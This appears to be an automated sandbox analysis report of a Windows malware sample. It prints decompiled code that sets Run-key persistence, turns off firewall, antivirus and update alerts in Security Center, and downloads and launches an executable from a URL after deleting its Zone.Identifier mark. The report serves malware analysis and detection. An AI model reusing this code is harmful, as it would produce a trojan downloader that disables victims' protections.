                                                                                                                                                                                                                                                                                    								if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                                    									L22:
                                                                                                                                                                                                                                                                                    									_t203 = E0040D390( &_v1588);
                                                                                                                                                                                                                                                                                    									_t286 = _t286 + 4;
                                                                                                                                                                                                                                                                                    									if((_t203 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    										goto L24;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									ExitProcess(0);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v3068 =  &_v1588;
                                                                                                                                                                                                                                                                                    								_v3072 = _v3068 + 2;
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									_v3074 =  *_v3068;
                                                                                                                                                                                                                                                                                    									_v3068 = _v3068 + 2;
                                                                                                                                                                                                                                                                                    								} while (_v3074 != 0);
                                                                                                                                                                                                                                                                                    								_v3080 = _v3068 - _v3072 >> 1;
                                                                                                                                                                                                                                                                                    								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3080 + _v3080 + 2);
                                                                                                                                                                                                                                                                                    								RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							ExitProcess(0);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t129 = _v3052;
                                                                                                                                                                                                                                                                                    						_t245 =  *((intOrPtr*)(_t129 + 2));
                                                                                                                                                                                                                                                                                    						_v3056 = _t245;
                                                                                                                                                                                                                                                                                    						_t25 = _v3048 + 2; // 0x790073
                                                                                                                                                                                                                                                                                    						if(_t245 !=  *_t25) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v3052 = _v3052 + 4;
                                                                                                                                                                                                                                                                                    						_v3048 = _v3048 + 4;
                                                                                                                                                                                                                                                                                    						if(_v3056 != 0) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                    					asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                                                                    					_v3060 = _t129;
                                                                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				ExitProcess(0);
                                                                                                                                                                                                                                                                                    			}
















































                                                                                                                                                                                                                                                                                    0x00405e1e
                                                                                                                                                                                                                                                                                    0x00405e24
                                                                                                                                                                                                                                                                                    0x00405e2e
                                                                                                                                                                                                                                                                                    0x00405e38
                                                                                                                                                                                                                                                                                    0x00405e4b
                                                                                                                                                                                                                                                                                    0x00405e53
                                                                                                                                                                                                                                                                                    0x00405e61
                                                                                                                                                                                                                                                                                    0x00405e71
                                                                                                                                                                                                                                                                                    0x00405e81
                                                                                                                                                                                                                                                                                    0x00405e81
                                                                                                                                                                                                                                                                                    0x00405e90
                                                                                                                                                                                                                                                                                    0x00405e90
                                                                                                                                                                                                                                                                                    0x00405ea1
                                                                                                                                                                                                                                                                                    0x00405ea7
                                                                                                                                                                                                                                                                                    0x00405eb8
                                                                                                                                                                                                                                                                                    0x00405ec2
                                                                                                                                                                                                                                                                                    0x00405ecc
                                                                                                                                                                                                                                                                                    0x00405ee2
                                                                                                                                                                                                                                                                                    0x00405ef3
                                                                                                                                                                                                                                                                                    0x00405f0a
                                                                                                                                                                                                                                                                                    0x00405f10
                                                                                                                                                                                                                                                                                    0x00405f1a
                                                                                                                                                                                                                                                                                    0x00405f31
                                                                                                                                                                                                                                                                                    0x00405f37
                                                                                                                                                                                                                                                                                    0x00405f47
                                                                                                                                                                                                                                                                                    0x00405f4d
                                                                                                                                                                                                                                                                                    0x00405f4d
                                                                                                                                                                                                                                                                                    0x00405f53
                                                                                                                                                                                                                                                                                    0x00405f56
                                                                                                                                                                                                                                                                                    0x00405f66
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405f70
                                                                                                                                                                                                                                                                                    0x00405fa7
                                                                                                                                                                                                                                                                                    0x00405fa7
                                                                                                                                                                                                                                                                                    0x00405fbe
                                                                                                                                                                                                                                                                                    0x00405fc4
                                                                                                                                                                                                                                                                                    0x00405fd1
                                                                                                                                                                                                                                                                                    0x0040623a
                                                                                                                                                                                                                                                                                    0x0040623f
                                                                                                                                                                                                                                                                                    0x0040625d
                                                                                                                                                                                                                                                                                    0x00406265
                                                                                                                                                                                                                                                                                    0x00406284
                                                                                                                                                                                                                                                                                    0x004062a3
                                                                                                                                                                                                                                                                                    0x004062c2
                                                                                                                                                                                                                                                                                    0x004062e1
                                                                                                                                                                                                                                                                                    0x00406300
                                                                                                                                                                                                                                                                                    0x0040631f
                                                                                                                                                                                                                                                                                    0x0040633e
                                                                                                                                                                                                                                                                                    0x0040634b
                                                                                                                                                                                                                                                                                    0x0040634b
                                                                                                                                                                                                                                                                                    0x00406369
                                                                                                                                                                                                                                                                                    0x00406371
                                                                                                                                                                                                                                                                                    0x00406390
                                                                                                                                                                                                                                                                                    0x004063af
                                                                                                                                                                                                                                                                                    0x004063ce
                                                                                                                                                                                                                                                                                    0x004063ed
                                                                                                                                                                                                                                                                                    0x0040640c
                                                                                                                                                                                                                                                                                    0x0040642b
                                                                                                                                                                                                                                                                                    0x0040644a
                                                                                                                                                                                                                                                                                    0x00406457
                                                                                                                                                                                                                                                                                    0x00406457
                                                                                                                                                                                                                                                                                    0x00406462
                                                                                                                                                                                                                                                                                    0x00406468
                                                                                                                                                                                                                                                                                    0x00406472
                                                                                                                                                                                                                                                                                    0x00406484
                                                                                                                                                                                                                                                                                    0x0040649b
                                                                                                                                                                                                                                                                                    0x004064b5
                                                                                                                                                                                                                                                                                    0x004064cd
                                                                                                                                                                                                                                                                                    0x004064d8
                                                                                                                                                                                                                                                                                    0x004064ed
                                                                                                                                                                                                                                                                                    0x004064f8
                                                                                                                                                                                                                                                                                    0x0040650d
                                                                                                                                                                                                                                                                                    0x00406518
                                                                                                                                                                                                                                                                                    0x0040651e
                                                                                                                                                                                                                                                                                    0x00406523
                                                                                                                                                                                                                                                                                    0x00406528
                                                                                                                                                                                                                                                                                    0x0040653b
                                                                                                                                                                                                                                                                                    0x00406540
                                                                                                                                                                                                                                                                                    0x00406545
                                                                                                                                                                                                                                                                                    0x0040654f
                                                                                                                                                                                                                                                                                    0x00406554
                                                                                                                                                                                                                                                                                    0x00406566
                                                                                                                                                                                                                                                                                    0x0040656d
                                                                                                                                                                                                                                                                                    0x00406582
                                                                                                                                                                                                                                                                                    0x00406588
                                                                                                                                                                                                                                                                                    0x0040659d
                                                                                                                                                                                                                                                                                    0x004065a4
                                                                                                                                                                                                                                                                                    0x004065b9
                                                                                                                                                                                                                                                                                    0x004065c0
                                                                                                                                                                                                                                                                                    0x004065c5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004065cc
                                                                                                                                                                                                                                                                                    0x00405fe2
                                                                                                                                                                                                                                                                                    0x00405ffd
                                                                                                                                                                                                                                                                                    0x0040601b
                                                                                                                                                                                                                                                                                    0x00406021
                                                                                                                                                                                                                                                                                    0x0040603a
                                                                                                                                                                                                                                                                                    0x00406119
                                                                                                                                                                                                                                                                                    0x0040611e
                                                                                                                                                                                                                                                                                    0x0040613c
                                                                                                                                                                                                                                                                                    0x00406142
                                                                                                                                                                                                                                                                                    0x0040615b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040616a
                                                                                                                                                                                                                                                                                    0x00406190
                                                                                                                                                                                                                                                                                    0x0040621b
                                                                                                                                                                                                                                                                                    0x00406222
                                                                                                                                                                                                                                                                                    0x00406227
                                                                                                                                                                                                                                                                                    0x00406230
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406234
                                                                                                                                                                                                                                                                                    0x00406234
                                                                                                                                                                                                                                                                                    0x0040619c
                                                                                                                                                                                                                                                                                    0x004061ab
                                                                                                                                                                                                                                                                                    0x004061b1
                                                                                                                                                                                                                                                                                    0x004061ba
                                                                                                                                                                                                                                                                                    0x004061c1
                                                                                                                                                                                                                                                                                    0x004061c8
                                                                                                                                                                                                                                                                                    0x004061e0
                                                                                                                                                                                                                                                                                    0x00406208
                                                                                                                                                                                                                                                                                    0x00406215
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406215
                                                                                                                                                                                                                                                                                    0x00406049
                                                                                                                                                                                                                                                                                    0x0040606f
                                                                                                                                                                                                                                                                                    0x004060fa
                                                                                                                                                                                                                                                                                    0x00406101
                                                                                                                                                                                                                                                                                    0x00406106
                                                                                                                                                                                                                                                                                    0x0040610f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406113
                                                                                                                                                                                                                                                                                    0x00406113
                                                                                                                                                                                                                                                                                    0x0040607b
                                                                                                                                                                                                                                                                                    0x0040608a
                                                                                                                                                                                                                                                                                    0x00406090
                                                                                                                                                                                                                                                                                    0x00406099
                                                                                                                                                                                                                                                                                    0x004060a0
                                                                                                                                                                                                                                                                                    0x004060a7
                                                                                                                                                                                                                                                                                    0x004060bf
                                                                                                                                                                                                                                                                                    0x004060e7
                                                                                                                                                                                                                                                                                    0x004060f4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004060f4
                                                                                                                                                                                                                                                                                    0x00405fe6
                                                                                                                                                                                                                                                                                    0x00405fe6
                                                                                                                                                                                                                                                                                    0x00405f72
                                                                                                                                                                                                                                                                                    0x00405f78
                                                                                                                                                                                                                                                                                    0x00405f7c
                                                                                                                                                                                                                                                                                    0x00405f89
                                                                                                                                                                                                                                                                                    0x00405f8d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405f8f
                                                                                                                                                                                                                                                                                    0x00405f96
                                                                                                                                                                                                                                                                                    0x00405fa5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405fa5
                                                                                                                                                                                                                                                                                    0x00405fb3
                                                                                                                                                                                                                                                                                    0x00405fb5
                                                                                                                                                                                                                                                                                    0x00405fb8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405fb8
                                                                                                                                                                                                                                                                                    0x00405ebc

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 00405E1E
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(2393737939739), ref: 00405E4B
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00405E61
                                                                                                                                                                                                                                                                                    • MoveFileA.KERNEL32(337372927,2282688262), ref: 00405E71
                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32 ref: 00405E81
                                                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,2u9o0b7n), ref: 00405EA1
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405EAD
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00405EBC
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004169D8,00000105), ref: 00405EE2
                                                                                                                                                                                                                                                                                    • PathFindFileNameW.SHLWAPI(004169D8), ref: 00405EED
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00405F0A
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00405F1A
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00405F31
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00405FE6
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00405FFD
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040601B
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00406032
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000003), ref: 00406049
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00406067
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32 ref: 004060E7
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004060F4
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00406113
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040611E
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040613C
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00406153
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000003), ref: 0040616A
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00406188
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32 ref: 00406208
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00406215
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00406234
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040623F
                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 0040625D
                                                                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 00406284
                                                                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004062A3
                                                                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 004062C2
                                                                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 004062E1
                                                                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406300
                                                                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 0040631F
                                                                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 0040633E
                                                                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 0040634B
                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 00406369
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 00406390
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004063AF
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 004063CE
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 004063ED
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 0040640C
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 0040642B
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 0040644A
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00406457
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00406462
                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00406484
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040649B
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004064B5
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004043F0,00000000,00000000,00000000), ref: 004064CD
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004064D8
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004054A0,00000000,00000000,00000000), ref: 004064ED
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004064F8
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00405CF0,00000000,00000000,00000000), ref: 0040650D
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00406518
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406535
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Value$File$Sleep$Createwsprintf$CloseExitOpenProcess$CopyThread$AttributesEnvironmentExpandMoveNamePathStrings$DeleteErrorEventExistsFindLastModuleMutexStartup
                                                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbcmds.dat$%s\tbnds.dat$%userprofile%$%windir%$038038$2282688262$2393737939739$297973937,$2u9o0b7n$333383737$337372927$33973397337$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\tbcmds.dat$C:\Users\user\tbnds.dat$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$Z#
                                                                                                                                                                                                                                                                                    • API String ID: 2549499605-2584291175
                                                                                                                                                                                                                                                                                    • Opcode ID: 9df56a7f00c6026db0bf5161a891f2dc72f09f899337a89f395dca71d961f2d3
                                                                                                                                                                                                                                                                                    • Instruction ID: 83af2952ddda4d09f50abae1b8075a5cb95368c24024515adc0fadd5cc82fc98
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9df56a7f00c6026db0bf5161a891f2dc72f09f899337a89f395dca71d961f2d3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1122EB1B80318ABE7209B50DC4AFD97774EB48B05F5081A5B309AA1D1D7F4AAC4CF5D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                    			E0040D4F0(char* _a4, char _a8) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				short _v1044;
                                                                                                                                                                                                                                                                                    				signed char _v1045;
                                                                                                                                                                                                                                                                                    				short _v1572;
                                                                                                                                                                                                                                                                                    				void* _v1576;
                                                                                                                                                                                                                                                                                    				void* _v1580;
                                                                                                                                                                                                                                                                                    				short _v2100;
                                                                                                                                                                                                                                                                                    				void _v2364;
                                                                                                                                                                                                                                                                                    				long _v2368;
                                                                                                                                                                                                                                                                                    				long _v2372;
                                                                                                                                                                                                                                                                                    				void* _v2376;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v2380;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2384;
                                                                                                                                                                                                                                                                                    				char _v2385;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2392;
                                                                                                                                                                                                                                                                                    				signed int _t88;
                                                                                                                                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                                                                                    				int _t96;
                                                                                                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                                                                                                    				void* _t112;
                                                                                                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                                                                                                    				int _t119;
                                                                                                                                                                                                                                                                                    				signed char _t125;
                                                                                                                                                                                                                                                                                    				signed char _t127;
                                                                                                                                                                                                                                                                                    				void* _t181;
                                                                                                                                                                                                                                                                                    				void* _t182;
                                                                                                                                                                                                                                                                                    				void* _t184;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				srand(GetTickCount());
                                                                                                                                                                                                                                                                                    				_t182 = _t181 + 4;
                                                                                                                                                                                                                                                                                    				_v1045 = 0;
                                                                                                                                                                                                                                                                                    				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                                                                                                                                                                                                                    				_v2380 = _a4;
                                                                                                                                                                                                                                                                                    				_v2384 = _v2380 + 1;
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					_v2385 =  *_v2380;
                                                                                                                                                                                                                                                                                    					_v2380 = _v2380 + 1;
                                                                                                                                                                                                                                                                                    				} while (_v2385 != 0);
                                                                                                                                                                                                                                                                                    				_v2392 = _v2380 - _v2384;
                                                                                                                                                                                                                                                                                    				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                                                                                                                                                                                                                    				_t88 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				_t90 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                                    				_t184 = _t182 + 0x20;
                                                                                                                                                                                                                                                                                    				_t94 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v2376 = _t94;
                                                                                                                                                                                                                                                                                    				if(_v2376 != 0) {
                                                                                                                                                                                                                                                                                    					_t112 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    					_v1576 = _t112;
                                                                                                                                                                                                                                                                                    					if(_v1576 != 0) {
                                                                                                                                                                                                                                                                                    						_t115 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                                                                                                                    						_v1580 = _t115;
                                                                                                                                                                                                                                                                                    						if(_v1580 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								_t119 = InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372); // executed
                                                                                                                                                                                                                                                                                    								if(_t119 == 0 || _v2372 == 0) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0); // executed
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							CloseHandle(_v1580);
                                                                                                                                                                                                                                                                                    							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                                    							DeleteFileW( &_v524); // executed
                                                                                                                                                                                                                                                                                    							Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    							_t125 = E0040D1D0( &_v1572); // executed
                                                                                                                                                                                                                                                                                    							_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                                                    							if((_t125 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    								DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								Sleep(0x7d0);
                                                                                                                                                                                                                                                                                    								_t127 = E0040D390( &_v1572); // executed
                                                                                                                                                                                                                                                                                    								_t184 = _t184 + 4;
                                                                                                                                                                                                                                                                                    								if((_t127 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    									_t51 =  &_a8; // 0x405de1
                                                                                                                                                                                                                                                                                    									if(( *_t51 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    										ExitProcess(0);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v1045 = 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						CloseHandle(_v1580);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v1576);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				InternetCloseHandle(_v2376);
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    				_t96 = _v1045 & 0x000000ff;
                                                                                                                                                                                                                                                                                    				if(_t96 == 0) {
                                                                                                                                                                                                                                                                                    					_t97 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                                                                                                                                                                                                                    					_t99 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t101 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push( &_v1572);
                                                                                                                                                                                                                                                                                    					_push( &_v1044);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					L0040ECB2();
                                                                                                                                                                                                                                                                                    					if(_t96 == 0) {
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                                    						DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    						if((E0040D1D0( &_v1572) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    							return DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						Sleep(0x7d0);
                                                                                                                                                                                                                                                                                    						_t111 = E0040D390( &_v1572) & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if(_t111 == 0) {
                                                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                                                    							return _t111;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t79 =  &_a8; // 0x405de1
                                                                                                                                                                                                                                                                                    						if(( *_t79 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						ExitProcess(0);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t96;
                                                                                                                                                                                                                                                                                    			}


































                                                                                                                                                                                                                                                                                    0x0040d500
                                                                                                                                                                                                                                                                                    0x0040d505
                                                                                                                                                                                                                                                                                    0x0040d508
                                                                                                                                                                                                                                                                                    0x0040d520
                                                                                                                                                                                                                                                                                    0x0040d529
                                                                                                                                                                                                                                                                                    0x0040d538
                                                                                                                                                                                                                                                                                    0x0040d53e
                                                                                                                                                                                                                                                                                    0x0040d546
